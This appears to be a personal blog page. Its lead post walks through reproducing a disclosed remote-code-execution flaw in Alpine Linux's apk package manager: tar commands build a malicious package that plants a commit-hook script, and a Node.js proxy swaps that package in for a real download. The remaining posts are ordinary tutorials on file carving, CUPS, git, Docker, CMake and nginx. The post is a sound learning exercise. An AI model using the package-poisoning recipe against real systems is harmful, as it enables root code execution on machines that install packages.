Matheus Bratfisch Cogito ergo sum

Testing RCE on Alpine Linux via APK

I have been studying a little bit of security and one of the things I’m doing from time to time is reading CVE and trying to test and understand what is happening. Yesterday Max Justicz published Remote Code Execution in Alpine Linux. He found an issues on apk which is the package manager for Alpine Linux which is super popular on docker images.

Max did a great job explaining the steps and the reasoning, but I wanted to try it myself.

- Create a folder at /etc/apk/commit_hooks.d/, which doesn’t exist by default. Extracted folders are not suffixed with .apk-new.
- Create a symlink to /etc/apk/commit_hooks.d/x named anything – say, link. This gets expanded to be called link.apk-new but still points to /etc/apk/commit_hooks.d/x.
- Create a regular file named link (which will also be expanded to link.apk-new). This will write through the symlink and create a file at /etc/apk/commit_hooks.d/x.
- When apk realizes that the package’s hash doesn’t match the signed index, it will first unlink link.apk-new – but /etc/apk/commit_hooks.d/x will persist! It will then fail to unlink /etc/apk/commit_hooks.d/ with ENOTEMPTY because the directory now contains our payload.

The instructions seem simple but if you are not super familiar with how a tar file works, you may not understand it. On a tar file you can have multiple versions/files with the same name and you can extract one of them using --occurrence option. With this in mind, the instructions make a little bit more sense, so shall we try to create this file?

First of all, let’s create the directories:

sudo mkdir /etc/apk/commit_hooks.d/
mkdir folder_for_link
mkdir folder_for_real_file

Create the link:

/etc/apk/commit_hooks.d/x folder_for_link/magic

Create the real file on folder_for_real_file/magic with this content:

#!/bin/sh

echo "something" > /tmp/test-12346-YAY
echo "ha" > /testfileroot

(If it really works we should have a /tmp/test-123456-YAY file and one /testfileroot too)

Cool, now it seems we have almost everything we need! Let’s create the apk with:

tar -zcvf bad-intention.apk /etc/apk/commit_hooks.d/ -C $PWD/folder_for_link/ magic -C $PWD/folder_for_real_file/ magic

Here we are adding all this 3 things in sequence to the tar file, you can check tar content with t option:

$ tar tvf bad-intention.apk
drwxr-xr-x root/root         0 2018-09-13 19:44 etc/apk/commit_hooks.d/
lrwxrwxrwx root/root         0 2018-09-13 19:37 magic -> /etc/apk/commit_hooks.d/x
-rwxrwxrwx root/root 954 2018-09-13 23:24 magic

(Pay attention on the order of this files: create directory commit_hooks.d, creation of link and creation of file)

What should be the behavior now? Since apk on alpine runs from / it will create the folder /etc/apk/commit_hooks.k, later it will extract the link and to finish it will output the content of magic to the link which will be placed inside the X file. Note, I lost A LOT of time trying to see this behavior on tar it self, but it seems tar doesn’t have this behavior and apk implements it’s own extractor.

OK, now, we need to deliver this file when running the apk add inside docker. Here, I have updated /etc/hosts and pointed dl-cdn.alpinelinux.org to localhost. Using libraries http-mitm-proxy http-proxy request on node I have created a script to deliver the bad .apk when downloading something which has ltrace on url otherwise it will download the file and send to the docker.

var http = require('http'),
    httpProxy = require('http-proxy'),
    request = require('request'),
    fileSystem = require('fs'),
    path = require('path');

var proxy = httpProxy.createProxyServer({});

var server = http.createServer(function(req, res) {
  console.log('http://nl.alpinelinux.org' + req.url)
  if (req.url.indexOf('ltrace') > -1) {
    console.log("Trapped")
    var filePath = path.join(__dirname, 'bad-intention.apk');
    var stat = fileSystem.statSync(filePath);
    var readStream = fileSystem.createReadStream(filePath);
    readStream.pipe(res);
  } else {
      proxy = request('http://nl.alpinelinux.org' + req.url)
      proxy.on('response', function (a, b) {}).pipe(res);
  }
});

console.log("listening on port 80")
server.listen(80);

Building my docker with docker build -t alpinetest --network=host --no-cache .

FROM alpine:3.8

# RUN apk add python
RUN apk add ltrace

CMD "/bin/sh"

(If you are curious you can take a look on the test of the docker image even if it failed to build and see your files are really inside the correct places. Use docker commit CONTAINER_ID and docker run -it SHA256_STRING sh.)

This returned “The command ‘/bin/sh -c apk add ltrace’ returned a non-zero code: 1”. This happened because apk verifies the signature or the apk and try to clean up the files, but it is not able to since /etc/apk/commit_hooks.k contains a file. How to do some magic to make the apk return exit code 0? Max has found one (or two) ways of doing this.

I still need to study what exactly the python script does to update the exit code but I have tested and it really works, as a quick test you can add RUN apk add python and update folder_for_real_file/magic to call his python code.

I know this may sound simple, but it took me a while to figure out all the tiny details. If you find any mistake I made, or want to say something, drop me a line!

Matheus

Comment

Find images on chrome cache files (or any other file!)

Good night,

Recently I have deleted a few images from my image which the old link was broken on the last few days. I decided to try to find them on the Google Chrome Cache. The url chrome://cache was recently removed, but you can find your chrome cache files at: /home/matheus/.cache/google-chrome/Default/Cache/.

If you open it as binary, you will see it is not a file directly. There is more information embeded in the file such as URL, headers, http status code and others. We could take a look on chrome source code to extract everything from the file, not only images. But to be honest I was lazy to dig into that because I had a very specific need in this case. Chrome cache storage

Why not scan the cache files for the JPEG binary? We would need to know how to find the start/end of image. We will have:

  • bytes 0xFF, 0xD8 indicate start of image
  • bytes 0xFF, 0xD9 indicate end of image

OK. So how would we do this in python?

Open the file as binary and check if there is a JFIF or EXIF marker on it. (Just trying to ignore files we can’t process)

f = open(filepath, 'rb')

data = f.read()
if 'JFIF' not in data and 'Exif' not in data:
	return

Now let’s iterate over all the bytes trying to find that specific sequence. To achieve this let’s have a prev which will have the value of the previous byte, pos to know which position we’re at and an array for SOI (Start of image) and EOI (End of Image) which will hold the positions for this markers. If the previous char is FF and the current one is D8, it will append to SOI, if it is D9 it will append to EOI.

prev = None
soi = []
eoi = []
pos = 0
for b in data:
	if prev is None:
		prev = b
		pos = pos + 1
		continue
	if prev == chr(0xFF):
		if b == chr(0xD8):
			soi.append(pos-1)
		elif b == chr(0xD9):
			eoi.append(pos-1)
	prev = b
	pos = pos + 1

We can get the SOI e EOI and save it. The only magic we will be doing here is getting the first SOI and the last SOI or EOI depending on each one is bigger.

path, filename = os.path.split(filepath)
file = open('{}/{}-{}.jpg'.format(OUTPUT_FOLDER, filename, 0), 'wb')
m1 = soi[0]
m2 = soi[-1] if soi[-1] > eoi[-1] else eoi[-1]
file.write(data[m1:m2])

file.close()

print(filename, "SOI", soi, len(soi))
print(filename, "EOI", eoi, len(eoi))

This code will save only one image. If you want you could iterate over the SOI and EOI and save multiple files.

Would this be some kind of file carving?

I hope this helps you! Matheus

Get this script create the OUTPUT_FOLDER and run it as python yourfile.py filetocheck, this version should be able to handle multiple images inside the same file. Now you can check and output stream for instance.

import os
import glob
import sys

OUTPUT_FOLDER = "output-this2"


def save_file(data, path, filename, count, eoi, soi):
	file = open('{}/{}-{}.jpg'.format(OUTPUT_FOLDER, filename, count), 'wb')
	m1 = soi[0]
	m2 = soi[-1] if soi[-1] > eoi[-1] else eoi[-1]
	file.write(data[m1:m2])
	file.close()

def extract(filepath):
	count = 0
	f = open(filepath, 'rb')

	data = f.read()
	if 'JFIF' not in data and 'Exif' not in data:
		return

	path, filename = os.path.split(filepath)

	old_soi = []
	old_eoi = []
	prev = None
	soi = []
	eoi = []
	eoi_found = False
	pos = 0
	for b in data:
		if prev is None:
			prev = b
			pos = pos + 1
			continue
		if prev == chr(0xFF):
			if b == chr(0xD8):
				if eoi_found:
					save_file(data, path, filename, count, eoi, soi)
					old_soi = old_soi + soi
					old_eoi = old_eoi + eoi
					soi = []
					eoi = []
					count = count + 1
					eoi_found = False
				soi.append(pos-1)
			elif b == chr(0xD9):
				eoi.append(pos-1)
				eoi_found = True
		prev = b
		pos = pos + 1

	save_file(data, path, filename, count, eoi, soi)
	print(filename, "SOI", soi, len(old_soi))
	print(filename, "EOI", eoi, len(old_eoi))

def main():
	if len(sys.argv) < 2:
		sys.exit(1)

	extract(sys.argv[1])

if __name__=="__main__":
	main()

Reference: https://stackoverflow.com/questions/4585527/detect-eof-for-jpg-images

Comment

Printer connected to Raspberry PI accessable from network.

Hey guys,

For a long time my father has beem complaining that using the printer wasn’t practical enough, so to solve this I decided to add a Raspberry pi Zero W connected to my printer (HP Deskjet F2050) and share the printer using CUPS.

Initially you need to connect to your RPi and install CUPS.

sudo apt-get install cups

If you want to have a webinterface to configure it from your local network, update /etc/cups/cupsd.conf

sudo vim /etc/cups/cupsd.conf

Find the line:

Listen localhost:631

And update it to:

# Listen localhost:631
Port 631

You will have multiple <Location, if you want to be able to access only from your computer, add Allow from YOUR_IP for every section. Example:

<Location />
  Order allow,deny
  Allow from 10.0.0.2
</Location>

(If you want from any, use Allow from all)

Add your user (in my case PI) to lpadmin group.

sudo usermod -a -G lpadmin pi

Access your Raspberry Pi ip on your browser on port 631 (https://RPI_IP:631/).

Go to Administration - Add printer Menu. You should see your local printer there, select it and follow the wizard to setup it.

If you’re using HP printer and can’t find yours, try:

sudo apt-get install hplip

And reboot.

Let me know if you have any problems.

See you, Matheus

Comment

Update default git commit author and reset for commit.

If you would like to set your global git author, use:

git config --global user.name "Your name"
git config --global user.email "[email protected]"

After having it set globally, you can to set your git author per project using:

git config user.name "Your name"
git config user.email "[email protected]"

And a bonus, If you need to reset the git commit author:

git commit --amend --reset-author

If you want to do it for multiple commits:

git rebase -i <COMMIT_HASH>

See you, Matheus

Comment

Docker-compose with PHP-FPM, sendmail, nginx, mariadb serving jekyll and wordpress

As I explained recently, I had a blog running Wordpress and decided to move to Jekyll but there was a catch, I didn’t want to loose any link I had to my wordpress blog, to achieve this, I setup an nginx which will try to find a static file from jekyll and if it is not found it will fallback to Wordpress.

I was running my server on ec2 instance with RDS and it was becoming a little bit expensive, so I decided to move everything to one machine and dockerize my setup so I could easily switch my servers.

To achieve this, I have created a docker-compose with:

  • PHP-FPM and sendmail to process php and sendmail
  • Nginx to serve jekyll static files and if they’re not found serve my old wordpress blog
  • MariaDB as my Database for Wordpress
version: '3'
services:
  fpm:
    # image: php:7.0-fpm-alpine
    build: php7fpm
    restart: always
    volumes:
      - ./wordpress.matbra.com/:/var/www/wordpress.matbra.com
      - ./php7fpm/sendmail.mc:/usr/share/sendmail/cf/debian/sendmail.mc
      - ./php7fpm/gmail-auth.db:/etc/mail/authinfo/gmail-auth.db
    ports:
      - "9000:9000"
    links:
      - mariadb 
    hostname: boarders.com.br
  
  nginx:
    image: nginx:1.10.1-alpine
    restart: always
    volumes:
      - ./nginx/nginx.conf:/etc/nginx/nginx.conf
      - ./nginx/app.vhost:/etc/nginx/conf.d/default.conf
      - ./logs/nginx:/var/log/nginx
      - ./wordpress.matbra.com/:/var/www/wordpress.matbra.com
      - ./jekyll.matbra.com/:/var/www/jekyll.matbra.com
    ports:
      - "80:80"
      - "443:443"
    links:
      - fpm

  mariadb:
    image: mariadb
    restart: always
    environment:
      - MYSQL_ROOT_PASSWORD=yourpassword
      - MYSQL_DATABASE=
    volumes:
    -   ./data/db:/var/lib/mysql

PHP-FPM container:

I’m using a custom Dockerfile which comes from php:7.0-fpm and add sendmail support and mysql extension. There is a custom starter script which will run sendmail + php-fpm. (I know I should create a specific container for sendmail)

On this container I’m basically mapping some php files and config files:

  • ./wordpress.matbra.com to /var/www/wordpress.matbra.com which are my wordpress files
  • ./php7fpm/sendmail.mc to /usr/share/sendmail/cf/debian/sendmail.mc which is my configuration file for sendmail
  • ./php7fpm/gmail-auth.db to /etc/mail/authinfo/gmail-auth.db which is the password for my gmail Configuring gmail as relay to sendmail

I’m also mapping the port 9000 to 9000, so I will communicate with PHP-FPM on this ports, creating a link to mariadb and naming my hostname.

NGINX container:

I’m using the regular nginx alpine with some maps:

  • ./nginx/nginx.conf to /etc/nginx/nginx.conf which is my nginx configuration
  • ./nginx/app.vhost to /etc/nginx/conf.d/default.conf which is my website configuration with Jekyll falling back to wordpress
  • ./logs/nginx to /var/log/nginx which will be my log directory
  • ./wordpress.matbra.com/ to /var/www/wordpress.matbra.com which is the place where nginx can find wordpress website
  • ./jekyll.matbra.com/ to /var/www/jekyll.matbra.com which is the place where nginx can find jekyll website

I’m also mapping ports 80 to 80 and 443 to 443 and create a link to PHP-FPM so nginx can communicate with fpm container.

MARIADB container:

No mistery here, regular mariadb image, with a mapping for data and some environment variables.

Because I’m not adding my website files to the image, I have created a command init.sh to remove website directory and clone website from git. There is a command called update-config.sh to update wp-config.php file with the correct environment variables.

With this I can easily spin up a new machine with my website structure.

https://github.com/x-warrior/blog-docker

I hope this will be helpful for you. Matheus

Comment

Install ZNC IRC Bouncer on AWS Linux

If you want to install ZNC IRC Bouncer you will need CMake, but AWS Linux CMake is too old. (Update your cmake to 3.x)[http://www.matbra.com/2017/12/07/install-cmake-on-aws-linux.html]

Now you will need git to clone the ZNC source code and openssl-devel to have ssl support

# yum install git openssl-devel

Clone ZNC source code

$ git clone https://github.com/znc/znc.git

Enter on the source code folder

$ cd znc

Initialize submodules

$ git submodule update --init --recursive

Install it with:

$ cmake . 
$ make
# make install (run this as root #)

Configure it with:

$ znc --makeconf

Best regards, Matheus

Comment

Install Cmake 3 on AWS Linux

If you are trying to build something using CMake and is getting the error: “CMake 3.1 or higher is required. You are running version 2.8.12.2”

You can manually install this CMake version, to do this, I removed the previous CMake.

# yum remove cmake

Tested if it was really removed

$ cmake 
-bash: /usr/bin/cmake: No such file or directory

Install G++

# yum install gcc-c++

Download latest version from: Cmake Download

$ wget https://cmake.org/files/v3.10/cmake-3.10.0.tar.gz

Extract it:

$ tar -xvzf cmake-3.10.0.tar.gz

Enter on cmake folder

$ cd cmake-3.10.0

Install it with:

# ./bootstrap
# make
# make install

Now you should have cmake under /usr/local/bin/cmake

Best regards, Matheus

Comment

Loopback model migration using postgresql database

I have been playing with Loopback, initially I was just declaring models and use in memory, but now I got to a point where I need to have a persistent database.

I couldn’t find how to keep my database synced with my models easily. I’m not sure if I’m not that familiar with Loopback yet, or if their documentation is not clear enough.

To create a script to sync your models with your database you can create a file under bin/ called autoupdate.js and add the following:

var path = require('path');

var app = require(path.resolve(__dirname, '../server/server'));
var ds = app.datasources.db;
ds.autoupdate(function(err) {
  if (err) throw err;
  ds.disconnect();
});

The code is pretty simple, it will fetch the app from server.js, grab the datasource and run the autoupate command. You could use automigrate, but this one will clean the database every time, so pay attention on this.

I think this will work for most of datasources, but if it doesn’t work for yours, drop me a line. I can try to help :D

Matheus

PS: Loopback will not create migrations and do a proper job as Django, sometimes you can get to weird states, it seems Loopback works better with NoSQL databases.

Comment

Django Storages with Boto3 and additional Metadata only for Media

I have a personal project which I’m using python with Django and django-storages to upload my static and media files to Amazon S3, because my media files have UUID and they’re not editable on my system I wanted to have a long expiration time on it, so I could save some bandwidth but I didn’t want this on the static files which are updated more regularly when I’m updating the system.

Most of resources refer to AWS_HEADERS but it didn’t work for me. It seems it is only for boto (not boto3) after looking into boto3 source code I discovered AWS_S3_OBJECT_PARAMETERS which works for boto3, but this is a system-wide setting, so I had to extend S3Boto3Storage.

So the code that solved my problem was:

class MediaRootS3Boto3Storage(S3Boto3Storage):
    location = 'media'
    object_parameters = {
        'CacheControl': 'max-age=604800'
    }

If you’re using boto (not boto3) and you want to have specific parameters only for Media classes you could use

class MediaRootS3Boto3Storage(S3BotoStorage):
    location = 'media'
    headers = {
        'CacheControl': 'max-age=604800'
    }

You also need to update your django-storages settings, pay attention to the class name, on boto 3 it is S3Boto3Storage on boto it doesn’t has the 3 after Boto.

DEFAULT_FILE_STORAGE = 'package.module.MediaRootS3Boto3Storage'

Very simple tip, but it took a while to find out how it works

Matheus

Comment

Nginx redirect on failure

As a few of you probably noticed, recently I have decided to update my really old wordpress blog from PHP4~5 to a most recent one. Leaving a shared host and going to heroku, which later became Amazon EC2.

I had to decide if I would keep Wordpress, or change to a different technology as Jekyll? Or what? I have thought a lot about this and in the end I decided to use Jekyll to be honest, why? Because using something new will motivate me to study, play with something new and work more.

Have decided to work with Jekyll, I had to think about my domain, because I didn’t want to break my old wordpress blog, I want to keep it alive as a record and keep it for SEO points, but how to keep both living together on an awesome way?

I thought the ideal would be to have something that tries to access the new website and if it is not found it should redirect to the old wordpress website. But how to redirect to the old blog only when a page is not found and complying with the http status code (ie: redirecting with 301).

After some documentation reading on nginx I found you can try to proxy to a server and if it fails redirect to a new one, it seems the ideal solution for now.

I have a nginx configuration file with multiple servers, first I have a nginx wordpress configuration, this server just adds PHP-FPM to process PHP files basically with my own custom domain.

server {
   listen 80;
   server_name wordpress.matbra.com;

    location / {
        root   /var/www/wordpress/live;
        index  index.php index.html index.htm;
        try_files $uri $uri/ /index.php?$uri$args;
    }

    location ~ \.php$ {
        root /var/www/wordpress/live;
        fastcgi_pass   unix:/var/run/php-fpm/php-fpm.sock;
        fastcgi_index  index.php;
        fastcgi_param  SCRIPT_FILENAME  $document_root$fastcgi_script_name;
        include        fastcgi_params;
    }
}

Read more